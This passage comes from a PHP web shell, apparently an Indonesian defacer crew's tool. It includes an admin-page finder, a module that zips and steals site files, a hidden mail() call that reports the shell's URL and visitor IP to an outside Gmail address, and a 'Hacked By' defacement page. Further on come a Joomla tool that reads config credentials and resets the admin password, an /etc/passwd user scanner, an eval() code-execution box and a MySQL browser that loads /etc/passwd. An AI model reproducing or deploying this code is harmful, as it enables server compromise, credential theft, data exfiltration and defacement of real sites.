3579panel-administracion/login.html
3580nsw/admin/login.php
3581webadmin/login.php
3582admin/admin_login.php
3583admin_login.php
3584admin_area/admin.html
3585pages/admin/admin-login.php
3586admin/admin-login.php
3587admin-login.php
3588bb-admin/index.html
3589bb-admin/login.html
3590bb-admin/admin.html
3591admin/home.html
3592pages/admin/admin-login.html
3593admin/admin-login.html
3594admin-login.html
3595admin/adminLogin.html
3596adminLogin.html
3597home.html
3598rcjakar/admin/login.php
3599adminarea/index.html
3600adminarea/admin.html
3601webadmin/index.php
3602webadmin/admin.php
3603user.html
3604modelsearch/login.html
3605adminarea/login.html
3606panel-administracion/index.html
3607panel-administracion/admin.html
3608modelsearch/index.html
3609modelsearch/admin.html
3610admincontrol/login.html
3611adm/index.html
3612adm.html
3613user.php
3614panel-administracion/login.php
3615wp-login.php
3616adminLogin.php
3617admin/adminLogin.php
3618home.php
3619adminarea/index.php
3620adminarea/admin.php
3621adminarea/login.php
3622panel-administracion/index.php
3623panel-administracion/admin.php
3624modelsearch/index.php
3625modelsearch/admin.php
3626admincontrol/login.php
3627adm/admloginuser.php
3628admloginuser.php
3629admin2/login.php
3630admin2/index.php
3631adm/index.php
3632adm.php
3633affiliate.php
3634adm_auth.php
3635memberadmin.php
3636administratorlogin.php
3637admin/admin.asp
3638admin_area/admin.asp
3639admin_area/login.asp
3640admin_area/index.asp
3641bb-admin/index.asp
3642bb-admin/login.asp
3643bb-admin/admin.asp
3644pages/admin/admin-login.asp
3645admin/admin-login.asp
3646admin-login.asp
3647user.asp
3648webadmin/index.asp
3649webadmin/admin.asp
3650webadmin/login.asp
3651admin/admin_login.asp
3652admin_login.asp
3653panel-administracion/login.asp
3654adminLogin.asp
3655admin/adminLogin.asp
3656home.asp
3657adminarea/index.asp
3658adminarea/admin.asp
3659adminarea/login.asp
3660panel-administracion/index.asp
3661panel-administracion/admin.asp
3662modelsearch/index.asp
3663modelsearch/admin.asp
3664admincontrol/login.asp
3665adm/admloginuser.asp
3666admloginuser.asp
3667admin2/login.asp
3668admin2/index.asp
3669adm/index.asp
3670adm.asp
3671affiliate.asp
3672adm_auth.asp
3673memberadmin.asp
3674administratorlogin.asp
3675siteadmin/login.asp
3676siteadmin/index.asp
3677ADMIN/
3678paneldecontrol/
3679login/
3680cms/
3681admon/
3682ADMON/
3683administrador/
3684ADMIN/login.php
3685panelc/
3686ADMIN/login.html";
3687function template() {
3688echo '
3689
3690<script type="text/javascript">
3691<!--
3692function insertcode($text, $place, $replace)
3693{
3694 var $this = $text;
3695 var logbox = document.getElementById($place);
3696 if($replace == 0)
3697 document.getElementById($place).innerHTML = logbox.innerHTML+$this;
3698 else
3699 document.getElementById($place).innerHTML = $this;
3700//document.getElementById("helpbox").innerHTML = $this;
3701}
3702-->
3703</script>
3704<br>
3705<br>
3706<h1 class="technique-two">
3707
3708
3709
3710</h1>
3711
3712<div class="wrapper">
3713<div class="red">
3714<div class="tube">
3715<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
3716<form action="" method="post" name="xploit_form">
3717
3718<tr>
3719<tr>
3720 <b><td>URL</td>
3721 <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
3722 </td>
3723</tr><tr>
3724 <td>404 string</td>
3725 <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
3726 </td></b>
3727</tr><br><td>
3728<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
3729</span></td></tr>
3730</form></td></tr>
3731<br /></table>
3732</div> <!-- /tube -->
3733</div> <!-- /red -->
3734<br />
3735<div class="green">
3736<div class="tube" id="rightcol">
3737Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
3738<b>Found ones:<br /></b>
3739</div> <!-- /tube -->
3740</div></center><!-- /green -->
3741<br clear="all" /><br />
3742<div class="blue">
3743<div class="tube" id="logbox">
3744<br />
3745<br />
3746Admin page Finder :<br /><br />
3747</div> <!-- /tube -->
3748</div> <!-- /blue -->
3749</div> <!-- /wrapper -->
3750<br clear="all"><br>';
3751}
3752function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
3753 if($br == 1) $msg .= "<br />";
3754 echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
3755 if($stop == 1) exit;
3756 @flush();@ob_flush();
3757}
3758function check($x, $front=0) {
3759 global $_POST,$site,$false;
3760 if($front == 0) $t = $site.$x;
3761 else $t = 'http://'.$x.'.'.$site.'/';
3762 $headers = get_headers($t);
3763 if (!eregi('200', $headers[0])) return 0;
3764 $data = @file_get_contents($t);
3765 if($_POST['xploit_404string'] == "") if($data == $false) return 0;
3766 if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
3767 return 1;
3768}
3769
3770// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3771template();
3772if(!isset($_POST['xploit_url'])) die;
3773if($_POST['xploit_url'] == '') die;
3774$site = $_POST['xploit_url'];
3775if ($site[strlen($site)-1] != "/") $site .= "/";
3776if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
3777$list['end'] = str_replace("\r", "", $list['end']);
3778$list['front'] = str_replace("\r", "", $list['front']);
3779$pathes = explode("\n", $list['end']);
3780$frontpathes = explode("\n", $list['front']);
3781show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
3782$verificate = 0;
3783foreach($pathes as $path) {
3784 show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
3785 $verificate++; show($verificate, 0, 0, 'verified', 1);
3786 if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
3787 else{
3788 show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
3789 show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
3790 }
3791}
3792preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
3793if(substr($site, 0, 3) == "www") $site = substr($site, 4);
3794foreach($frontpathes as $frontpath) {
3795 show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
3796 $verificate++; show($verificate, 0, 0, 'verified', 1);
3797 if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
3798 else{
3799 show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
3800 show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
3801 }
3802
3803}
3804}
3805?>
3806<?php
3807if(isset($_GET['x']) && ($_GET['x'] == 'maling')){ ?>
3808<form action="?y=<?php echo $pwd; ?>&x=maling" method="post">
3809<form method="post" action="" enctype="multipart/form-data">
3810<input type=text name=sites size=40></nobr><br>
3811<input type="submit" name="go" value="Colong!" style="margin: 5px auto; hight: 25px; width: 100px;">
3812</form>
3813<?php
3814$site = explode("\r\n", $_POST['sites']);
3815$go = $_POST['go'];
3816if($go) {
3817foreach($site as $sites) {
3818@session_start();
3819@error_reporting(0);
3820@ini_set('error_log',NULL);
3821@ini_set('log_errors',0);
3822@ini_set('max_execution_time',0);
3823@ini_set('display_errors', 0);
3824@set_time_limit(0);
3825$folder="$sites";
3826$output="hasil-maling.zip";
3827$zip = new ZipArchive();
3828
3829if ($zip->open($output, ZIPARCHIVE::CREATE) !== TRUE) {
3830 die ("Unable to open Archirve");
3831}
3832
3833$all= new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
3834
3835foreach ($all as $f=>$value) {
3836 $zip->addFile(realpath($f), $f) or die ("ERROR: Unable to add file: $f");
3837}
3838$zip->close();
3839echo "Selamat Anda Berhasil Mencuri Data Website ";
3840}
3841}
3842}
3843?>
3844<?php
3845@ini_set('output_buffering', 0);
3846@ini_set('display_errors', 0);
3847set_time_limit(0);
3848ini_set('memory_limit', '64M');
3849header('Content-Type: text/html; charset=UTF-8');
3850$tujuanmail = 'kefiex403@gmail.com';
3851$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
3852$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
3853mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
3854?>
3855<?php
3856if(isset($_GET['x']) && ($_GET['x'] == 'about'))
3857 {
3858 ?>
3859 <form action="?y=<?php echo $pwd; ?>&x=about" method="post">
3860 <html>
3861<head>
3862
3863<title>-+ Hacked By Para Jones +-</title>
3864<link href='http://fonts.googleapis.com/css?family=Fauna+One' rel='stylesheet' type='text/css'>
3865<link rel='shortcut icon' href='http://hunter.ozha-shop.com/MY.jpg'></link>
3866<meta http-equiv='Content-Type' content='text/html; charset=utf-8'/>
3867<meta name='keywords' content='kefiex404'>
3868<meta HTTP-EQUIV='Content-Type' content='text/html; charset=iso-8859-1'/>
3869<meta name='description' content='kefiex404'>
3870<meta content='hacked' name='description'/>
3871<meta content='go.id,defacer,hacked,hacker,news,idbte4m,never die' name='keywords'/>
3872<meta content='INDEX, FOLLOW' name='ROBOTS'/>
3873<meta content='omahunduh.com' name='author'/>
3874<body bgcolor='#000' marginwidth='0' marginheight='0' style='background: black no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size:cover;' onload='(function(a){window.CloudFlare && window.CloudFlare.push(function(b){b(["cloudflare/rocket"],function(c){c.push(function(){(function(){type_text()}).call(a)})})})})(this);' bottommargin='0' rightmargin='0' leftmargin='0' topmargin='0'>
3875<style>body{font-family:'courier new';font-size:80%;color:#28FE14;}.xBody{width:660px;height:450px;position:absolute;z-index:9;}.ssh{display:none;z-index:9;}.sshBox{height:300px;border:4px solid white;-moz-border-radius:4px;-webkit-border-radius:4px;-o-border-radius:4x;-khtml-border-radius:4px;border-radius:4px;z-index:9;}.sshHead{margin-bottom:5px;color:black;font-weight:bold;background-color:white;height:20px;z-index:9;}.greenBox{padding-left:3px;position:absolute;height:22px;border:1px solid #28FE14;z-index:9;}.picz{position:absolute;width:500px;height:80%;display:none;right:2px;top:2px;}#mg img:hover{-webkit-animation:tremer 0.5s linear infinite;-moz-animation:tremer 0.5s linear infinite;-o-animation:tremer 0.5s linear infinite;animation:tremer 0.5s linear infinite;}.neon{<!--coleur lootz--> color:blue;text-shadow:0 0 5px red,0 0 10px red,0 0 30px orange,0 0 45px yellow,0 0 60px red;}.like{border:4px double yellow;box-shadow:0px 2px 20px white;border-radius:10px;padding:9px;height:310px;}#mg img{border:4px double yellow;border-radius:10px;opacity:0.75;-moz-opacity:0.75;filter:alpha(opacity=75);}</style>
3876</head>
3877<body bgcolor='black'>
3878
3879<center>
3880
3881<body onselectstart='return false' ondragstart='return false' oncontextmenu='return false' onLoad='(function(a){window.CloudFlare && window.CloudFlare.push(function(b){b(["cloudflare/rocket"],function(c){c.push(function(){(function(){writetext()}).call(a)})})})})(this);'>
3882<center>
3883<font face='iceland' color='red'>
3884<center>
3885<div id='mg'>
3886<center><a title='KEFIEX404'> <p class='style5'><div align='center'><table width='100%'border='0 '><tr><td align='left'><img src='http://zonehmirrors.org/defaced/2016/11/11/alignlifewauwatosa.com/kefiex.yu.tl/files/bnx.png' height='150' width='250'/ </td><br />
3887<td align='center'> <img src='http://omahunduh.com/omahunduh.com.jpg' alt='Omah Unduh' height='150' width='250'></td><br />
3888<td align='right'><img src='http://kerinci.kemenag.go.id//wp-content//uploads//files//guest//87.php.jpg' height='150' width='250'/ ></td></tr></table></
3889</div></p></center>
3890<br>
3891
3892<td width='90%'><font color='aqua' size='4'>
3893-=| WE NOT ONLY TE4M BUT WE ARE FAMILY |=-<br>
3894<br><td width='90%'><font color='aqua' size='4'>
3895DEFACER TERSAKITI TEAM | HACKER SAKIT HATI | PASUKAN BERANI MATI | BOCAH NEWBIE | MADLEETS <br> IDCA | CIREBON CYBER TEAM | MALANG CYBER ARMY | BALIKITA TEAM | SANJUNGAN JIWA <br> KONTOL MIBER | JEMBUT NGRIWUL | PEJUH MUNCRAT | DADI ANAK
3896<BR><br>
3897<font color='red'>-= WE ARE THE TROUBLE MAKER =- </font><br>
3898<marquee><code><font color='blue' face='consolas' size='4'>
3899<p align='left' class='style2'><font face='Trajan Pro' size='4' color='RED' style='text-shadow: 2px 0px .2em aqua, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'>
3900~ ./KEFIEX404 ~ MANIAK KASUR ~ MR.K ~ EL-RO ~ ANTONIO HsH ~ TUAN GALAU ~ DEDEMIT ID ~ NO SCRIPT 404 ~ K3C0T ~ SIM0D ~ Anton Kill ~ LITLE H4XORZ ~ ANDRIF PZF ~ Syntax-Error ~ FadliDotID_007 ~ SANEKALA ~ YUDHI DM ~ TUSBOLLED~ ALL INDOXPLOIT CREW ~ SHOR7CUT ~ GRETZ IDBTE4M ~ GOENK TEA ~ ./HDV ~ ADRIAN XDA ~ DIDOT ~ POETRA D`M ~ JACK D`RIPPER ~
3901 DAY IDBTE4M ~ DIMAZ BN ~ DEMONK ~ KHUNAY ~ MR-AQ ~ HENDRA D`N ~ PETAPA GENIT ~ KODRAT ~ MUZZAM ~ MAULANA ~ SIRIN ~ ~ X-Wu7z ~ Tuan_galau ~ GrenXPaRTa ~ x'1n73ct ~ m@db100d ~ Hacker Sakit Hati ~ ./$amndan404 ~ ./wi.na ~ Neneng Juhairiah ~ Mr_Oxygen ~ ./coco ~ H3ri.ID ~ Ice Cream ~ newbie patah hati ~ Naughty_r00tz ~ DarkWireless ~ ./czw_07 ~ ./TanpaNama404 ~ xCut10n ~ Kucing Galau ~ ./anjirGBX ~ Dicky Injector ~ jepry_vuln ~ Shut_Down404 ~ Mr.404_NotFound ~ Mr.LittleHaxor ~ Mr.Ghostteror_404 ~ Mr.Dork ~ Mr.aji.192 ~ L4W_CyberDKSH404.Not_Found ~ ozlok ~ Bloc_Anon/404 ~ R3DD3V1L ~ mr.cookie_302 ~ @HF404_
3902~ S4bun ~ WokTampan ~ Ozi L0calhost ~ isal dot id ~ pys404 ~ tomhawk ~ Localhost ~ Dhammashoka1337 ~ Dreamless ~ Ambara Cyber Army ~ CarLi ~ /AwKarin ~ ./Kandani ~ s4bun ~ ./BlaDDzeRR ~ bL@cKID ~ Mr.Vendetta_404 ~ ./Kandasx1337 ~ ./94nt3n9 ~ SkumFuk-45 ~ LukeWalker ~ R1W1l 3PR1W4R3 ~ AND YOU ~ </font></code></marquee>
3903<br>
3904<strong>-+ IDBTE4M AREA GALAU RAMARIMARI +-</strong>
3905</td>
3906</center>
3907<br> <br></span></div>
3908
3909<iframe width='0%' height='0' src='https://cf-media.sndcdn.com/3wW39mx0grIP.128.mp3?Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiKjovL2NmLW1lZGlhLnNuZGNkbi5jb20vM3dXMzlteDBncklQLjEyOC5tcDMiLCJDb25kaXRpb24iOnsiRGF0ZUxlc3NUaGFuIjp7IkFXUzpFcG9jaFRpbWUiOjE0ODU1MTI5OTR9fX1dfQ__&Signature=kWxSIqms70Xwt0eHS2Fs9AgX2k3vwI-AKuFj2FN0KprNT4yVvumb2s7taYzOkEC0sac00kAZGSrYSfxBe0yo3rQarEts2SlTs2BmiYpSLfpW-ZF4xDT3VoLl9Vb9CriORNk37e-pO~tgGHe6VJZs3hrNGv00IkBeiCNt~U5r~V7YfKTDFRBv8TGrdJ~YtHLV0uLmmDuZ~arzVQqNM0Jm1QZtLzpZ8CFd9CRNms3WjhuVbdRtgS25fC0BgaWk74WvLMVJWmibrNiksPugnqNM~-re-MzM8HFDH9WqDmf3rfLmc1v2vxSP6Dj6LqnqU15oHUPdHnoI-XxJiYOcFJT-JA__&Key-Pair-Id=APKAJAGZ7VMH2PFPW6UQ' frameborder='0'></iframe>
3910
3911<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
3912
3913<script type='text/javascript'>
3914/* <![CDATA[ */
3915var _gaq = _gaq || [];
3916_gaq.push(['_setAccount', 'UA-5341948-14']);
3917_gaq.push(['_trackPageview']);
3918
3919(function() {
3920var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
3921ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
3922var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
3923})();
3924
3925(function(b){(function(a){'__CF'in b&&'DJS'in b.__CF?b.__CF.DJS.push(a):'addEventListener'in b?b.addEventListener('load',a,!1):b.attachEvent('onload',a)})(function(){'FB'in b&&'Event'in FB&&'subscribe'in FB.Event&&(FB.Event.subscribe('edge.create',function(a){_gaq.push(['_trackSocial','facebook','like',a])}),FB.Event.subscribe('edge.remove',function(a){_gaq.push(['_trackSocial','facebook','unlike',a])}),FB.Event.subscribe('message.send',function(a){_gaq.push(['_trackSocial','facebook','send',a])}));'twttr'in b&&'events'in twttr&&'bind'in twttr.events&&twttr.events.bind('tweet',function(a){if(a){var b;if(a.target&&a.target.nodeName=='IFRAME')a:{if(a=a.target.src){a=a.split('#')[0].match(/[^?=&]+=([^&]*)?/g);b=0;for(var c;c=a[b];++b)if(c.indexOf('url')===0){b=unescape(c.split('=')[1]);break a}}b=void 0}_gaq.push(['_trackSocial','twitter','tweet',b])}})})})(window);
3926/* ]]> */
3927</script>
3928<?php
3929}
3930//////////////////////////////////////////////////////////////////////////////
3931
3932?>
3933<?php
3934if (isset($_GET['idb']) && ($_GET['idb'] == 'jomla')) {
3935?>
3936<form action="?&idb=jomla" method="post">
3937<?php
3938error_reporting(0);
3939 if($_POST){
3940
3941 function jipukteks($param, $kata1, $kata2){
3942 if(strpos($param, $kata1) === FALSE) return FALSE;
3943 if(strpos($param, $kata2) === FALSE) return FALSE;
3944 $start = strpos($param, $kata1) + strlen($kata1);
3945 $end = strpos($param, $kata2, $start);
3946 $return = substr($param, $start, $end - $start);
3947 return $return;
3948}
3949
3950 function anucurl($sites){
3951 $ch1 = curl_init ("$sites");
3952curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
3953curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
3954curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3955curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
3956curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
3957curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
3958curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
3959curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
3960$data = curl_exec ($ch1);
3961return $data;
3962 }
3963
3964function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
3965 $post2 = array(
3966 "username" => "$fak1",
3967 "passwd" => "$fak2",
3968 "lang" => "en-GB",
3969 "option" => "com_login",
3970 "task" => "login",
3971 "return" => "$fak3",
3972 "$fak4" => "1",
3973
3974 );
3975$ch = curl_init ("$cek");
3976curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3977curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3978curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3979curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
3980curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3981curl_setopt ($ch, CURLOPT_POST, 1);
3982curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
3983curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3984curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3985$data6 = curl_exec ($ch);
3986return $data6;
3987 }
3988
3989 $link = $_POST['link'];
3990 if($link==""){
3991 echo "Report: <br>";
3992 echo "-> Link Config anda belum terisi <-";
3993 }
3994 else{
3995
3996 $file = anucurl($link);
3997
3998 $host = jipukteks($file,"smtphost = '","'");
3999 $username = jipukteks($file,"user = '","'");
4000 $password = jipukteks($file,"password = '","'");
4001 $db = jipukteks($file,"db = '","'");
4002 $dbprefix = jipukteks($file,"dbprefix = '","'");
4003 $user_baru = "admin";
4004 $password_baru = "kefiex";
4005 $prefix = $dbprefix."users";
4006 $pass = md5("$password_baru");
4007 $serah = $db.".".$dbprefix;
4008
4009
4010 echo "<font color='#C6C646'>Database Content :</font><br>";
4011 echo "Db Host          : <font color='green'>$host</font><br>";
4012 echo "Db user           : <font color='green'>$username</font><br>";
4013 echo "Db Password  : <font color='green'>$password</font><br>";
4014 echo "Db name         : <font color='green'>$db</font><br>";
4015 echo "Table_Prefix   : <font color='green'>$dbprefix</font><br>";
4016
4017 mysql_connect($host,$username,$password) or die("<br><font color='red'>Gagal Terkoneksi Ke Database ...</font>");
4018 mysql_select_db($db) or die("<font color='red'>Database tidak bisa dibuka ...</font>");
4019
4020 $show=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
4021 $r=mysql_fetch_array($show);
4022 $id = $r[id];
4023
4024 mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
4025$utama = "$link";
4026$kedua = @file_get_contents($utama);
4027if(preg_match("askdasldasdlja12123",$kedua)){
4028 echo "# <font color='green'>berhasil rubah password</font><br>";
4029 echo "# $utama<br>";
4030
4031 }
4032 else{
4033 echo "<br># <font color='green'>Pasword berhasil dirubah: </font><br>";
4034 echo "Username: <font color='#C6C646'>$user_baru</font><br>";
4035 echo "Password: <font color='#C6C646'>$password_baru</font><br>";
4036
4037
4038 }
4039 }
4040
4041
4042
4043
4044 }else{
4045 echo '<html>
4046 <body>
4047 <center>
4048 <center><br><span style="font-size:1.6em;"> .: Joomla Password Reset | Tools :. </span><br>Coded by Bl4ckcod37</center><br>
4049 <table>
4050 <tr><td><form method="post"></td></tr>
4051 <tr><td><input class="inputz" size=50 type="text" name="link" placeholder="masukkan link config disini"></td></tr>
4052
4053 <tr><td>                                                 <input
4054class="inputz" type="submit" value="Reset"></td></tr>
4055 </form>
4056 </table>
4057
4058 </center>
4059
4060 </body>
4061</html><br><br><br><br>';
4062 }
4063}
4064 ?>
4065<?php
4066if (isset($_GET['idb']) && ($_GET['idb'] == 'sken')) {
4067set_time_limit(0);
4068
4069($x0b = ini_get('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');
4070
4071@$x0c = fopen('/etc/passwd','r');
4072
4073if (!$x0c) { die('<b> RAIMU ELEK WKWKWKWK :v </b>'); }
4074
4075// $x0d = array();
4076// $x0e = array();
4077// $x0f = array();
4078// $x10 = 0;
4079
4080while(!feof($x0c)){
4081 // baca baris...
4082 // $x11 = fgets($x0c);
4083 // if ($x10 < 35){
4084 while($x11 = fgets($x0c)){
4085
4086 $x12 = strpos($x11,':');
4087
4088 $x13 = substr($x11,0,$x12);
4089
4090
4091 $x14 = '/home/'.$x13.'/public_html';
4092 if (($x13 != '')){
4093
4094 if (is_readable($x14)){
4095
4096 echo "<font face=Verdana size=2 color=#c000ff>Hajar Boss => $x14</font>";
4097 echo "<br/>";
4098 }
4099 }
4100 }
4101 // $x10++;
4102 }
4103}
4104?>
4105 </div></div></div></div></div></div>
4106<?php
4107 if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
4108 <form action="?y=<?php echo $pwd; ?>&x=php" method="post">
4109 <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); }
4110 else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea>
4111 <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form>
4112 <?php } elseif(isset($_GET['idb']) && ($_GET['idb'] == 'sql')){
4113 if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
4114 $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
4115 if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
4116 $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
4117 $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\">[ databases ]</a>"; if(isset($_GET['db']))
4118 $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
4119 if(isset($_GET['table'])) $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
4120 $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
4121 $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
4122 $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
4123 $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
4124 $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables);
4125 foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; }
4126 elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array();
4127 $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z']))
4128 $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
